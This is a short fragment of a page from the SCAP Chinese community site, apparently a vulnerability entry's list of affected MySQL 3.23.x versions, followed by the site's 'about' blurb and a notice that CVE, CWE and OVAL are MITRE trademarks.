MySQL AB MySQL 3.23.5

MySQL AB MySQL 3.23.50

MySQL AB MySQL 3.23.51

MySQL AB MySQL 3.23.52

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站